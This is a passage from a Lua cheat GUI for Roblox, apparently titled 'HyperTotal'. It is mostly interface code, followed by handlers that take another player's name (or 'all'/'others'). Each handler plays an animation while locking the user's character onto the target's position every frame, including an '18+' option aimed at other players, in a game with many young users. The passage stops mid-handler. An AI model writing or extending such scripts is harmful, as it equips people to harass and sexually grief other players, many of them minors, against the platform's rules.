UDim2.new(0.0286500659, 0, 0.609710157, 0) Levitate.Size = UDim2.new(0, 140, 0, 25) Levitate.Font = Enum.Font.SourceSans Levitate.FontSize = Enum.FontSize.Size14 Levitate.Text = "Levitate" Levitate.TextScaled = true Levitate.TextSize = 14 Levitate.TextWrapped = true Dinosaur.Name = "Dinosaur" Dinosaur.Parent = Local_Player Dinosaur.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) Dinosaur.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) Dinosaur.Position = UDim2.new(0.54435122, 0, 0.609710157, 0) Dinosaur.Size = UDim2.new(0, 140, 0, 25) Dinosaur.Font = Enum.Font.SourceSans Dinosaur.FontSize = Enum.FontSize.Size14 Dinosaur.Text = "Dinosaur" Dinosaur.TextScaled = true Dinosaur.TextSize = 14 Dinosaur.TextWrapped = true Glitchy.Name = "Glitchy" Glitchy.Parent = Local_Player Glitchy.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) Glitchy.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) Glitchy.Position = UDim2.new(0.54435122, 0, 0.783913076, 0) Glitchy.Size = UDim2.new(0, 140, 0, 25) Glitchy.Font = Enum.Font.SourceSans Glitchy.FontSize = Enum.FontSize.Size14 Glitchy.Text = "Glitchy" Glitchy.TextScaled = true Glitchy.TextSize = 14 Glitchy.TextWrapped = true NoLimbs.Name = "NoLimbs" NoLimbs.Parent = Local_Player NoLimbs.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) NoLimbs.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) NoLimbs.Position = UDim2.new(0.0286500659, 0, 0.783913076, 0) NoLimbs.Size = UDim2.new(0, 140, 0, 25) NoLimbs.Font = Enum.Font.SourceSans NoLimbs.FontSize = Enum.FontSize.Size14 NoLimbs.Text = "No Limbs" NoLimbs.TextScaled = true NoLimbs.TextSize = 14 NoLimbs.TextWrapped = true Animations.Name = "Animations" Animations.Parent = Sections Animations.BackgroundColor3 = Color3.new(0.278431, 0.278431, 0.278431) Animations.BorderColor3 = Color3.new(0.121569, 0.121569, 0.121569) Animations.BorderSizePixel = 2 Animations.Size = UDim2.new(0, 350, 0, 230) Animations.Visible = false ANIMATIONSGUIDE.Name = "ANIMATIONSGUIDE" ANIMATIONSGUIDE.Parent = Animations ANIMATIONSGUIDE.BackgroundColor3 = Color3.new(1, 1, 1) ANIMATIONSGUIDE.BackgroundTransparency = 1 ANIMATIONSGUIDE.Position = UDim2.new(0.0286500659, 0, 0.0435507223, 0) ANIMATIONSGUIDE.Size = UDim2.new(0, 332, 0, 35) ANIMATIONSGUIDE.Font = Enum.Font.ArialBold ANIMATIONSGUIDE.FontSize = Enum.FontSize.Size14 ANIMATIONSGUIDE.Text = "Do cool commands with animations on others." ANIMATIONSGUIDE.TextScaled = true ANIMATIONSGUIDE.TextSize = 14 ANIMATIONSGUIDE.TextStrokeColor3 = Color3.new(1, 0.658824, 0.0666667) ANIMATIONSGUIDE.TextStrokeTransparency = 0 ANIMATIONSGUIDE.TextWrapped = true _18.Name = "18+" _18.Parent = Animations _18.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) _18.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) _18.Position = UDim2.new(0.0286500659, 0, 0.261304349, 0) _18.Size = UDim2.new(0, 140, 0, 25) _18.Font = Enum.Font.SourceSans _18.FontSize = Enum.FontSize.Size14 _18.Text = "18+" _18.TextScaled = true _18.TextSize = 14 _18.TextWrapped = true Hide.Name = "Hide" Hide.Parent = Animations Hide.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) Hide.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) Hide.Position = UDim2.new(0.54435122, 0, 0.261304349, 0) Hide.Size = UDim2.new(0, 140, 0, 25) Hide.Font = Enum.Font.SourceSans Hide.FontSize = Enum.FontSize.Size14 Hide.Text = "Hide" Hide.TextScaled = true Hide.TextSize = 14 Hide.TextWrapped = true PushLock.Name = "PushLock" PushLock.Parent = Animations PushLock.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) PushLock.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) PushLock.Position = UDim2.new(0.54435122, 0, 0.435507238, 0) PushLock.Size = UDim2.new(0, 140, 0, 25) PushLock.Font = Enum.Font.SourceSans PushLock.FontSize = Enum.FontSize.Size14 PushLock.Text = "Push Lock" PushLock.TextScaled = true PushLock.TextSize = 14 PushLock.TextWrapped = true SlamOn.Name = "SlamOn" SlamOn.Parent = Animations SlamOn.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) SlamOn.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) SlamOn.Position = UDim2.new(0.0286500659, 0, 0.435507238, 0) SlamOn.Size = UDim2.new(0, 140, 0, 25) SlamOn.Font = Enum.Font.SourceSans SlamOn.FontSize = Enum.FontSize.Size14 SlamOn.Text = "Slam On" SlamOn.TextScaled = true SlamOn.TextSize = 14 SlamOn.TextWrapped = true LevitateOn.Name = "LevitateOn" LevitateOn.Parent = Animations LevitateOn.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) LevitateOn.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) LevitateOn.Position = UDim2.new(0.0286500659, 0, 0.609710157, 0) LevitateOn.Size = UDim2.new(0, 140, 0, 25) LevitateOn.Font = Enum.Font.SourceSans LevitateOn.FontSize = Enum.FontSize.Size14 LevitateOn.Text = "Levitate On" LevitateOn.TextScaled = true LevitateOn.TextSize = 14 LevitateOn.TextWrapped = true Dance.Name = "Dance" Dance.Parent = Animations Dance.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) Dance.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) Dance.Position = UDim2.new(0.54435122, 0, 0.609710157, 0) Dance.Size = UDim2.new(0, 140, 0, 25) Dance.Font = Enum.Font.SourceSans Dance.FontSize = Enum.FontSize.Size14 Dance.Text = "Dance" Dance.TextScaled = true Dance.TextSize = 14 Dance.TextWrapped = true ExperimentalAnimation.Name = "ExperimentalAnimation" ExperimentalAnimation.Parent = Animations ExperimentalAnimation.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) ExperimentalAnimation.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) ExperimentalAnimation.Position = UDim2.new(0.54435122, 0, 0.783913076, 0) ExperimentalAnimation.Size = UDim2.new(0, 140, 0, 25) ExperimentalAnimation.Font = Enum.Font.SourceSans ExperimentalAnimation.FontSize = Enum.FontSize.Size14 ExperimentalAnimation.Text = "Experimental Animation" ExperimentalAnimation.TextScaled = true ExperimentalAnimation.TextSize = 14 ExperimentalAnimation.TextWrapped = true Carpet.Name = "Carpet" Carpet.Parent = Animations Carpet.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) Carpet.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) Carpet.Position = UDim2.new(0.0286500659, 0, 0.783913076, 0) Carpet.Size = UDim2.new(0, 140, 0, 25) Carpet.Font = Enum.Font.SourceSans Carpet.FontSize = Enum.FontSize.Size14 Carpet.Text = "Carpet" Carpet.TextScaled = true Carpet.TextSize = 14 Carpet.TextWrapped = true Extra.Name = "Extra" Extra.Parent = Sections Extra.BackgroundColor3 = Color3.new(0.278431, 0.278431, 0.278431) Extra.BorderColor3 = Color3.new(0.121569, 0.121569, 0.121569) Extra.BorderSizePixel = 2 Extra.Size = UDim2.new(0, 350, 0, 230) Extra.Visible = false EXTRAGUIDE.Name = "EXTRAGUIDE" EXTRAGUIDE.Parent = Extra EXTRAGUIDE.BackgroundColor3 = Color3.new(1, 1, 1) EXTRAGUIDE.BackgroundTransparency = 1 EXTRAGUIDE.Position = UDim2.new(0.0286500659, 0, 0.0435507223, 0) EXTRAGUIDE.Size = UDim2.new(0, 332, 0, 35) EXTRAGUIDE.Font = Enum.Font.ArialBold EXTRAGUIDE.FontSize = Enum.FontSize.Size14 EXTRAGUIDE.Text = "Extra commands for yourself." EXTRAGUIDE.TextScaled = true EXTRAGUIDE.TextSize = 14 EXTRAGUIDE.TextStrokeColor3 = Color3.new(1, 0.658824, 0.0666667) EXTRAGUIDE.TextStrokeTransparency = 0 EXTRAGUIDE.TextWrapped = true Sit.Name = "Sit" Sit.Parent = Extra Sit.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) Sit.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) Sit.Position = UDim2.new(0.0286500659, 0, 0.261304349, 0) Sit.Size = UDim2.new(0, 140, 0, 25) Sit.Font = Enum.Font.SourceSans Sit.FontSize = Enum.FontSize.Size14 Sit.Text = "Sit" Sit.TextScaled = true Sit.TextSize = 14 Sit.TextWrapped = true Jump.Name = "Jump" Jump.Parent = Extra Jump.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) Jump.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) Jump.Position = UDim2.new(0.54435122, 0, 0.261304349, 0) Jump.Size = UDim2.new(0, 140, 0, 25) Jump.Font = Enum.Font.SourceSans Jump.FontSize = Enum.FontSize.Size14 Jump.Text = "Jump" Jump.TextScaled = true Jump.TextSize = 14 Jump.TextWrapped = true PlatformStand.Name = "PlatformStand" PlatformStand.Parent = Extra PlatformStand.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) PlatformStand.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) PlatformStand.Position = UDim2.new(0.54435122, 0, 0.435507238, 0) PlatformStand.Size = UDim2.new(0, 140, 0, 25) PlatformStand.Font = Enum.Font.SourceSans PlatformStand.FontSize = Enum.FontSize.Size14 PlatformStand.Text = "Platform Stand" PlatformStand.TextScaled = true PlatformStand.TextSize = 14 PlatformStand.TextWrapped = true Freeze.Name = "Freeze" Freeze.Parent = Extra Freeze.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) Freeze.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) Freeze.Position = UDim2.new(0.0286500659, 0, 0.435507238, 0) Freeze.Size = UDim2.new(0, 140, 0, 25) Freeze.Font = Enum.Font.SourceSans Freeze.FontSize = Enum.FontSize.Size14 Freeze.Text = "Freeze" Freeze.TextScaled = true Freeze.TextSize = 14 Freeze.TextWrapped = true Insane.Name = "Insane" Insane.Parent = Extra Insane.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) Insane.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) Insane.Position = UDim2.new(0.0286500659, 0, 0.609710157, 0) Insane.Size = UDim2.new(0, 140, 0, 25) Insane.Font = Enum.Font.SourceSans Insane.FontSize = Enum.FontSize.Size14 Insane.Text = "Insane" Insane.TextScaled = true Insane.TextSize = 14 Insane.TextWrapped = true TPVoid.Name = "TPVoid" TPVoid.Parent = Extra TPVoid.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) TPVoid.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) TPVoid.Position = UDim2.new(0.54435122, 0, 0.609710157, 0) TPVoid.Size = UDim2.new(0, 140, 0, 25) TPVoid.Font = Enum.Font.SourceSans TPVoid.FontSize = Enum.FontSize.Size14 TPVoid.Text = "TP Void" TPVoid.TextScaled = true TPVoid.TextSize = 14 TPVoid.TextWrapped = true Unknown.Name = "Unknown" Unknown.Parent = Extra Unknown.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) Unknown.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) Unknown.Position = UDim2.new(0.54435122, 0, 0.783913076, 0) Unknown.Size = UDim2.new(0, 140, 0, 25) Unknown.Font = Enum.Font.SourceSans Unknown.FontSize = Enum.FontSize.Size14 Unknown.Text = "Unknown" Unknown.TextScaled = true Unknown.TextSize = 14 Unknown.TextWrapped = true Reset.Name = "Reset" Reset.Parent = Extra Reset.BackgroundColor3 = Color3.new(0.854902, 0.854902, 0.854902) Reset.BorderColor3 = Color3.new(0.941177, 0.701961, 0.133333) Reset.Position = UDim2.new(0.0286500659, 0, 0.783913076, 0) Reset.Size = UDim2.new(0, 140, 0, 25) Reset.Font = Enum.Font.SourceSans Reset.FontSize = Enum.FontSize.Size14 Reset.Text = "Reset" Reset.TextScaled = true Reset.TextSize = 14 Reset.TextWrapped = true SelectTabs.Name = "SelectTabs" SelectTabs.Parent = MainFrame SelectTabs.BackgroundColor3 = Color3.new(0.435294, 0.435294, 0.435294) SelectTabs.BorderColor3 = Color3.new(0.121569, 0.121569, 0.121569) SelectTabs.BorderSizePixel = 2 SelectTabs.Position = UDim2.new(-0.286500663, 0, 0.148395061, 0) SelectTabs.Size = UDim2.new(0, 98, 0, 230) SelectTabs.CanvasSize = UDim2.new(0, 0, 1.20000005, 0) RocketPropulsionTAB.Name = "RocketPropulsionTAB" RocketPropulsionTAB.Parent = SelectTabs RocketPropulsionTAB.BackgroundColor3 = Color3.new(1, 1, 1) RocketPropulsionTAB.BackgroundTransparency = 1 RocketPropulsionTAB.Position = UDim2.new(0, 0, 0.00999999978, 0) RocketPropulsionTAB.Size = UDim2.new(0, 82, 0, 40) RocketPropulsionTAB.Font = Enum.Font.SourceSansLight RocketPropulsionTAB.FontSize = Enum.FontSize.Size18 RocketPropulsionTAB.Text = "Rocket Propulsion" RocketPropulsionTAB.TextSize = 18 RocketPropulsionTAB.TextWrapped = true TeleportationTAB.Name = "TeleportationTAB" TeleportationTAB.Parent = SelectTabs TeleportationTAB.BackgroundColor3 = Color3.new(1, 1, 1) TeleportationTAB.BackgroundTransparency = 1 TeleportationTAB.Position = UDim2.new(0, 0, 0.150000006, 0) TeleportationTAB.Size = UDim2.new(0, 82, 0, 40) TeleportationTAB.Font = Enum.Font.SourceSansLight TeleportationTAB.FontSize = Enum.FontSize.Size18 TeleportationTAB.Text = "Teleportation" TeleportationTAB.TextSize = 17 TeleportationTAB.TextWrapped = true ToolsTAB.Name = "ToolsTAB" ToolsTAB.Parent = SelectTabs ToolsTAB.BackgroundColor3 = Color3.new(1, 1, 1) ToolsTAB.BackgroundTransparency = 1 ToolsTAB.Position = UDim2.new(0, 0, 0.289999992, 0) ToolsTAB.Size = UDim2.new(0, 82, 0, 40) ToolsTAB.Font = Enum.Font.SourceSansLight ToolsTAB.FontSize = Enum.FontSize.Size24 ToolsTAB.Text = "Tools" ToolsTAB.TextSize = 20 ToolsTAB.TextWrapped = true AnimationsTAB.Name = "AnimationsTAB" AnimationsTAB.Parent = SelectTabs AnimationsTAB.BackgroundColor3 = Color3.new(1, 1, 1) AnimationsTAB.BackgroundTransparency = 1 AnimationsTAB.Position = UDim2.new(0, 0, 0.569999993, 0) AnimationsTAB.Size = UDim2.new(0, 82, 0, 40) AnimationsTAB.Font = Enum.Font.SourceSansLight AnimationsTAB.FontSize = Enum.FontSize.Size24 AnimationsTAB.Text = "Animations" AnimationsTAB.TextSize = 20 AnimationsTAB.TextWrapped = true BasicTAB.Name = "BasicTAB" BasicTAB.Parent = SelectTabs BasicTAB.BackgroundColor3 = Color3.new(1, 1, 1) BasicTAB.BackgroundTransparency = 1 BasicTAB.Position = UDim2.new(0, 0, 0.430000007, 0) BasicTAB.Size = UDim2.new(0, 82, 0, 40) BasicTAB.Font = Enum.Font.SourceSansLight BasicTAB.FontSize = Enum.FontSize.Size24 BasicTAB.Text = "Basic" BasicTAB.TextSize = 20 BasicTAB.TextWrapped = true Local_PlayerTAB.Name = "Local_PlayerTAB" Local_PlayerTAB.Parent = SelectTabs Local_PlayerTAB.BackgroundColor3 = Color3.new(1, 1, 1) Local_PlayerTAB.BackgroundTransparency = 1 Local_PlayerTAB.Position = UDim2.new(0, 0, 0.709999979, 0) Local_PlayerTAB.Size = UDim2.new(0, 82, 0, 40) Local_PlayerTAB.Font = Enum.Font.SourceSansLight Local_PlayerTAB.FontSize = Enum.FontSize.Size24 Local_PlayerTAB.Text = "Local Player" Local_PlayerTAB.TextSize = 20 Local_PlayerTAB.TextWrapped = true ExtraTAB.Name = "ExtraTAB" ExtraTAB.Parent = SelectTabs ExtraTAB.BackgroundColor3 = Color3.new(1, 1, 1) ExtraTAB.BackgroundTransparency = 1 ExtraTAB.Position = UDim2.new(0, 0, 0.850000024, 0) ExtraTAB.Size = UDim2.new(0, 82, 0, 40) ExtraTAB.Font = Enum.Font.SourceSansLight ExtraTAB.FontSize = Enum.FontSize.Size24 ExtraTAB.Text = "Extra" ExtraTAB.TextSize = 20 ExtraTAB.TextWrapped = true SideFrame.Name = "SideFrame" SideFrame.Parent = HyperTotal SideFrame.Active = true SideFrame.BackgroundColor3 = Color3.new(1, 1, 1) SideFrame.BackgroundTransparency = 1 SideFrame.Draggable = true SideFrame.Position = UDim2.new(0.349, 0, 0.25, 0) SideFrame.Size = UDim2.new(0, 350, 0, 40) SideFrame.Visible = false SideTopFrame.Name = "SideTopFrame" SideTopFrame.Parent = SideFrame SideTopFrame.BackgroundColor3 = Color3.new(0.121569, 0.121569, 0.121569) SideTopFrame.BorderColor3 = Color3.new(0.121569, 0.121569, 0.121569) SideTopFrame.BorderSizePixel = 2 SideTopFrame.Position = UDim2.new(-0.287, 0, 0, 0) SideTopFrame.Size = UDim2.new(0, 450, 0, 270) SideTopFrame.ZIndex = 9 SideTitle.Name = "SideTitle" SideTitle.Parent = SideTopFrame SideTitle.BackgroundColor3 = Color3.new(1, 1, 1) SideTitle.BackgroundTransparency = 1 SideTitle.Position = UDim2.new(0.356534153, 0, 0, 0) SideTitle.Size = UDim2.new(0, 150, 0, 40) SideTitle.ZIndex = 10 SideTitle.Font = Enum.Font.SourceSansItalic SideTitle.FontSize = Enum.FontSize.Size36 SideTitle.Text = "HyperTotal" SideTitle.TextColor3 = Color3.new(0.933333, 0.670588, 0.0509804) SideTitle.TextSize = 35 SideTitle.TextWrapped = true OpenGUI.Name = "OpenGUI" OpenGUI.Parent = SideTopFrame OpenGUI.BackgroundColor3 = Color3.new(1, 1, 1) OpenGUI.BackgroundTransparency = 1 OpenGUI.Position = UDim2.new(0.913618803, 0, 0, 0) OpenGUI.Size = UDim2.new(0, 40, 0, 40) OpenGUI.ZIndex = 10 OpenGUI.Font = Enum.Font.SourceSansBold OpenGUI.FontSize = Enum.FontSize.Size60 OpenGUI.Text = "X" OpenGUI.TextColor3 = Color3.new(1, 0.631373, 0.109804) OpenGUI.TextSize = 50 OpenGUI.TextWrapped = true SideCreditTXT.Name = "SideCreditTXT" SideCreditTXT.Parent = SideTopFrame SideCreditTXT.BackgroundColor3 = Color3.new(1, 1, 1) SideCreditTXT.BackgroundTransparency = 1 SideCreditTXT.Position = UDim2.new(0.690784931, 0, 0.250416666, 0) SideCreditTXT.Rotation = -17 SideCreditTXT.Size = UDim2.new(0, 90, 0, 20) SideCreditTXT.ZIndex = 10 SideCreditTXT.Font = Enum.Font.SourceSansItalic SideCreditTXT.FontSize = Enum.FontSize.Size24 SideCreditTXT.Text = "illremember" SideCreditTXT.TextColor3 = Color3.new(0.933333, 0.819608, 0.737255) SideCreditTXT.TextSize = 20 SideCreditTXT.TextWrapped = true BrickFrame.Name = "BrickFrame" BrickFrame.Parent = MainFrame BrickFrame.BackgroundColor3 = Color3.new(0.121569, 0.121569, 0.121569) BrickFrame.BorderColor3 = Color3.new(0.121569, 0.121569, 0.121569) BrickFrame.BorderSizePixel = 0 BrickFrame.Position = UDim2.new(0, 0, 0.148395061, 0) BrickFrame.Size = UDim2.new(0, 0, 0, 230) BrickFrame.ZIndex = 4 -- Buttons col = Color3.new(0.854902, 0.854902, 0.854902) loc = Color3.new(0.65, 0.90, 0.65) wait(1) MainFrame:TweenPosition(UDim2.new(0.348623842, 0, 0.25, 0), "Out", "Bounce", 2) if game:GetService("Workspace").FilteringEnabled == false then FE_CHECK.Text = "FE is disabled" FE_CHECK.TextColor3 = Color3.fromRGB(200, 10, 10) else FE_CHECK.Text = "FE is enabled" FE_CHECK.TextColor3 = Color3.fromRGB(10, 200, 10) end CloseGUI.MouseButton1Click:connect(function() CloseGUI.Visible = false EnterUsername.Visible = false TopFrame:TweenSize(UDim2.new(0, 450, 0, 270), "Out", "Sine", 1) wait(1) SideFrame.Position = MainFrame.Position MainFrame.Visible = false SideFrame.Visible = true SideTopFrame:TweenSize(UDim2.new(0, 450, 0, 40), "Out", "Sine", 1) OpenGUI.Visible = false wait(1) OpenGUI.Visible = true end) OpenGUI.MouseButton1Click:connect(function() OpenGUI.Visible = false SideTopFrame:TweenSize(UDim2.new(0, 450, 0, 270), "Out", "Sine", 1) wait(1) MainFrame.Position = SideFrame.Position SideFrame.Visible = false MainFrame.Visible = true CloseGUI.Visible = false TopFrame:TweenSize(UDim2.new(0, 450, 0, 40), "Out", "Sine", 1) wait(1) EnterUsername.Visible = true CloseGUI.Visible = true end) AnimationsTAB.MouseButton1Click:connect(function() BrickFrame:TweenSize(UDim2.new(0, 350, 0, 230), "Out", "Sine", 0.5) wait(0.5) Animations.Visible = true Basic.Visible = false Extra.Visible = false INTRO.Visible = false Local_Player.Visible = false RocketPropulsion.Visible = false Teleportation.Visible = false Tools.Visible = false AnimationsTAB.Font = "SourceSansBold" BasicTAB.Font = "SourceSansLight" ExtraTAB.Font = "SourceSansLight" Local_PlayerTAB.Font = "SourceSansLight" RocketPropulsionTAB.Font = "SourceSansLight" TeleportationTAB.Font = "SourceSansLight" ToolsTAB.Font = "SourceSansLight" AnimationsTAB.TextSize = 17 TeleportationTAB.TextSize = 17 BrickFrame:TweenSize(UDim2.new(0, 0, 0, 230), "Out", "Sine", 0.5) end) BasicTAB.MouseButton1Click:connect(function() BrickFrame:TweenSize(UDim2.new(0, 350, 0, 230), "Out", "Sine", 0.5) wait(0.5) Animations.Visible = false Basic.Visible = true Extra.Visible = false INTRO.Visible = false Local_Player.Visible = false RocketPropulsion.Visible = false Teleportation.Visible = false Tools.Visible = false AnimationsTAB.Font = "SourceSansLight" BasicTAB.Font = "SourceSansBold" ExtraTAB.Font = "SourceSansLight" Local_PlayerTAB.Font = "SourceSansLight" RocketPropulsionTAB.Font = "SourceSansLight" TeleportationTAB.Font = "SourceSansLight" ToolsTAB.Font = "SourceSansLight" AnimationsTAB.TextSize = 20 TeleportationTAB.TextSize = 17 BrickFrame:TweenSize(UDim2.new(0, 0, 0, 230), "Out", "Sine", 0.5) end) ExtraTAB.MouseButton1Click:connect(function() BrickFrame:TweenSize(UDim2.new(0, 350, 0, 230), "Out", "Sine", 0.5) wait(0.5) Animations.Visible = false Basic.Visible = false Extra.Visible = true INTRO.Visible = false Local_Player.Visible = false RocketPropulsion.Visible = false Teleportation.Visible = false Tools.Visible = false AnimationsTAB.Font = "SourceSansLight" BasicTAB.Font = "SourceSansLight" ExtraTAB.Font = "SourceSansBold" Local_PlayerTAB.Font = "SourceSansLight" RocketPropulsionTAB.Font = "SourceSansLight" TeleportationTAB.Font = "SourceSansLight" ToolsTAB.Font = "SourceSansLight" AnimationsTAB.TextSize = 20 TeleportationTAB.TextSize = 17 BrickFrame:TweenSize(UDim2.new(0, 0, 0, 230), "Out", "Sine", 0.5) end) Local_PlayerTAB.MouseButton1Click:connect(function() BrickFrame:TweenSize(UDim2.new(0, 350, 0, 230), "Out", "Sine", 0.5) wait(0.5) Animations.Visible = false Basic.Visible = false Extra.Visible = false INTRO.Visible = false Local_Player.Visible = true RocketPropulsion.Visible = false Teleportation.Visible = false Tools.Visible = false AnimationsTAB.Font = "SourceSansLight" BasicTAB.Font = "SourceSansLight" ExtraTAB.Font = "SourceSansLight" Local_PlayerTAB.Font = "SourceSansBold" RocketPropulsionTAB.Font = "SourceSansLight" TeleportationTAB.Font = "SourceSansLight" ToolsTAB.Font = "SourceSansLight" AnimationsTAB.TextSize = 20 TeleportationTAB.TextSize = 17 BrickFrame:TweenSize(UDim2.new(0, 0, 0, 230), "Out", "Sine", 0.5) end) RocketPropulsionTAB.MouseButton1Click:connect(function() BrickFrame:TweenSize(UDim2.new(0, 350, 0, 230), "Out", "Sine", 0.5) wait(0.5) Animations.Visible = false Basic.Visible = false Extra.Visible = false INTRO.Visible = false Local_Player.Visible = false RocketPropulsion.Visible = true Teleportation.Visible = false Tools.Visible = false AnimationsTAB.Font = "SourceSansLight" BasicTAB.Font = "SourceSansLight" ExtraTAB.Font = "SourceSansLight" Local_PlayerTAB.Font = "SourceSansLight" RocketPropulsionTAB.Font = "SourceSansBold" TeleportationTAB.Font = "SourceSansLight" ToolsTAB.Font = "SourceSansLight" AnimationsTAB.TextSize = 20 TeleportationTAB.TextSize = 17 BrickFrame:TweenSize(UDim2.new(0, 0, 0, 230), "Out", "Sine", 0.5) end) TeleportationTAB.MouseButton1Click:connect(function() BrickFrame:TweenSize(UDim2.new(0, 350, 0, 230), "Out", "Sine", 0.5) wait(0.5) Animations.Visible = false Basic.Visible = false Extra.Visible = false INTRO.Visible = false Local_Player.Visible = false RocketPropulsion.Visible = false Teleportation.Visible = true Tools.Visible = false AnimationsTAB.Font = "SourceSansLight" BasicTAB.Font = "SourceSansLight" ExtraTAB.Font = "SourceSansLight" Local_PlayerTAB.Font = "SourceSansLight" RocketPropulsionTAB.Font = "SourceSansLight" TeleportationTAB.Font = "SourceSansBold" ToolsTAB.Font = "SourceSansLight" AnimationsTAB.TextSize = 20 TeleportationTAB.TextSize = 15 BrickFrame:TweenSize(UDim2.new(0, 0, 0, 230), "Out", "Sine", 0.5) end) ToolsTAB.MouseButton1Click:connect(function() BrickFrame:TweenSize(UDim2.new(0, 350, 0, 230), "Out", "Sine", 0.5) wait(0.5) Animations.Visible = false Basic.Visible = false Extra.Visible = false INTRO.Visible = false Local_Player.Visible = false RocketPropulsion.Visible = false Teleportation.Visible = false Tools.Visible = true AnimationsTAB.Font = "SourceSansLight" BasicTAB.Font = "SourceSansLight" ExtraTAB.Font = "SourceSansLight" Local_PlayerTAB.Font = "SourceSansLight" RocketPropulsionTAB.Font = "SourceSansLight" TeleportationTAB.Font = "SourceSansLight" ToolsTAB.Font = "SourceSansBold" AnimationsTAB.TextSize = 20 TeleportationTAB.TextSize = 17 BrickFrame:TweenSize(UDim2.new(0, 0, 0, 230), "Out", "Sine", 0.5) end) ------ ANIMATIONS ------------------------------------------------------------------------- ------ ANIMATIONS ------------------------------------------------------------------------- ------ ANIMATIONS ------------------------------------------------------------------------- ------ ANIMATIONS ------------------------------------------------------------------------- function GetPlayer(String) -- Credit to Timeless/xFunnieuss local Found = {} local strl = String:lower() if strl == "all" then for i, v in pairs(game:GetService("Players"):GetPlayers()) do table.insert(Found, v) end elseif strl == "others" then for i, v in pairs(game:GetService("Players"):GetPlayers()) do if v.Name ~= game:GetService("Players").LocalPlayer.Name then table.insert(Found, v) end end else for i, v in pairs(game:GetService("Players"):GetPlayers()) do if v.Name:lower():sub(1, #String) == String:lower() then table.insert(Found, v) end end end return Found end AnimationId = "148840371" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://" .. AnimationId local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) _18active = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) _18active = false end) _18.MouseButton1Click:connect(function() _18active = not _18active if _18active then _18.BackgroundColor3 = loc for i, v in pairs(GetPlayer(EnterUsername.Text)) do track:Play() game:GetService('RunService').Stepped:connect(function() if _18active then game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame end end) end else track:Stop() _18.BackgroundColor3 = col end end) AnimationId = "282574440" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://" .. AnimationId local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) CarpetActive = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) CarpetActive = false end) Carpet.MouseButton1Click:connect(function() CarpetActive = not CarpetActive if CarpetActive then Carpet.BackgroundColor3 = loc for i, v in pairs(GetPlayer(EnterUsername.Text)) do track:Play() game:GetService('RunService').Stepped:connect(function() if CarpetActive then game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame end end) end else track:Stop() Carpet.BackgroundColor3 = col end end) AnimationId = "215384594" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://" .. AnimationId local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) ExperimentalAnimationActive = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) ExperimentalAnimationActive = false end) ExperimentalAnimation.MouseButton1Click:connect(function() ExperimentalAnimationActive = not ExperimentalAnimationActive if ExperimentalAnimationActive then ExperimentalAnimation.BackgroundColor3 = loc for i, v in pairs(GetPlayer(EnterUsername.Text)) do track:Play(0.1, 1, 5) game:GetService('RunService').Stepped:connect(function() if ExperimentalAnimationActive then game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame end end) end else track:Stop() ExperimentalAnimation.BackgroundColor3 = col end end) AnimationId = "429703734" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://" .. AnimationId local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) DanceActive = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) DanceActive = false end) Dance.MouseButton1Click:connect(function() DanceActive = not DanceActive if DanceActive then Dance.BackgroundColor3 = loc for i, v in pairs(GetPlayer(EnterUsername.Text)) do 